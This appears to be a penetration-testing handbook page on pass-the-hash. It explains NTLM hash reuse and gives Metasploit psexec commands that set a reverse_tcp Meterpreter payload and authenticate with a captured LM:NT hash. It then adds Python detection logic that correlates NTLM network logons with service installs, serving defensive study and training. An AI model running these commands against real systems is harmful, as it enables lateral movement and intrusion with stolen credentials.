handbook/tools/4.Exploitation/Metasploit/Modules/Add-on/Pass-the-Hash.md
2024-08-31 01:07:22 +02:00

General

Pass-the-hash (PtH) is a technique that allows an attacker to authenticate to a remote system using the NTLM or LAN Manager (LM) hash of a user's password instead of the password itself. It works because NTLM challenge-response authentication computes the response from the hash rather than from the plaintext, so the hash is password-equivalent: whoever holds it can gain access to a system or network without ever knowing the actual password of the user.

On a Windows system, user passwords are not stored in plaintext but as hashes in the system's local security database, the Security Account Manager (SAM). When a user enters their password, the system hashes the entered password and compares the result with the stored hash to authenticate the user.

In a PtH attack, the attacker obtains the hash of a user's password and uses it to authenticate to a system as that user. The hash can be captured in a variety of ways, such as with a network sniffer, by extracting it from a compromised system, or with a tool like Mimikatz. Once the attacker has the hash, they can authenticate to a system without knowing the actual password. For defenders this means the hash must be protected like the password itself (no shared local administrator passwords across hosts, least privilege for accounts whose hashes are cached on many machines), and an NTLM network logon for an account that should be authenticating with Kerberos is a signal worth triaging.

Commands

Make sure you have gathered a hash before starting this step and that you already have a Meterpreter session.

PtH Module

```
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
show options   # review and set RHOSTS, RPORT, SMBDomain, SMBUser and SMBPass (plaintext password or LM:NT hash), plus LHOST for the reverse payload
run
```
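The PtH explanation above and the psexec module that follows both leave the same footprint on the target: an NTLM network logon (Security event 4624, logon type 3) followed by a service installation (System event 7045). The detection logic below is an added defender-side example, not part of the handbook or of Metasploit; it runs over constructed key=value renderings of those events (the field names `host`, `id`, `LogonType`, `AuthPkg`, `User`, `Domain`, `Src`, `Service` and the hostnames and addresses are assumptions for the sample, not a real log format).

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry): a flattened key=value view of
# Windows Security 4624 (logon) and System 7045 (service installed) events.
SAMPLE_EVENTS = [
    "2024-08-31T01:05:02 host=FS01 id=4624 LogonType=3 AuthPkg=Kerberos User=alice Domain=CORP Src=10.0.0.5",
    "2024-08-31T01:07:10 host=FS01 id=4624 LogonType=3 AuthPkg=NTLM User=Administrator Domain=CORP Src=10.0.0.99",
    "2024-08-31T01:07:12 host=FS01 id=7045 Service=wXyZqK ImagePath=%SystemRoot%\\wXyZqK.exe",
    "2024-08-31T01:09:00 host=WS07 id=4624 LogonType=3 AuthPkg=NTLM User=svc_backup Domain=CORP Src=10.0.0.7",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Split the timestamp off and turn the remaining key=value pairs into a dict."""
    ts, rest = line.split(" ", 1)
    event = dict(FIELD_RE.findall(rest))
    event["ts"] = datetime.fromisoformat(ts)
    return event

def ntlm_network_logons(events):
    """4624 network logons (type 3) authenticated with NTLM. A remote PtH logon
    looks exactly like this, but so does legitimate NTLM fallback, so on its own
    this is a lead to triage, not an alert."""
    return [e for e in events
            if e.get("id") == "4624" and e.get("LogonType") == "3" and e.get("AuthPkg") == "NTLM"]

def psexec_style_alerts(events, window=timedelta(seconds=60)):
    """Correlate an NTLM network logon with a 7045 service installation on the same
    host within `window`: the footprint that psexec-style execution leaves behind."""
    services = [e for e in events if e.get("id") == "7045"]
    alerts = []
    for logon in ntlm_network_logons(events):
        for svc in services:
            delta = (svc["ts"] - logon["ts"]).total_seconds()
            if svc["host"] == logon["host"] and 0 <= delta <= window.total_seconds():
                alerts.append({"host": logon["host"], "user": logon["User"],
                               "src": logon["Src"], "service": svc["Service"]})
    return alerts

def analyse(lines=SAMPLE_EVENTS):
    """Return (NTLM logons to triage, correlated psexec-style alerts) for the given lines."""
    events = [parse_event(line) for line in lines]
    return ntlm_network_logons(events), psexec_style_alerts(events)

if __name__ == "__main__":
    leads, alerts = analyse()
    print(f"{len(leads)} NTLM network logons to triage, {len(alerts)} psexec-style alert(s): {alerts}")
```

In the sample, the Kerberos logon for alice is ignored, both NTLM logons are surfaced as leads, and only the one on FS01 that is followed two seconds later by a service install becomes an alert.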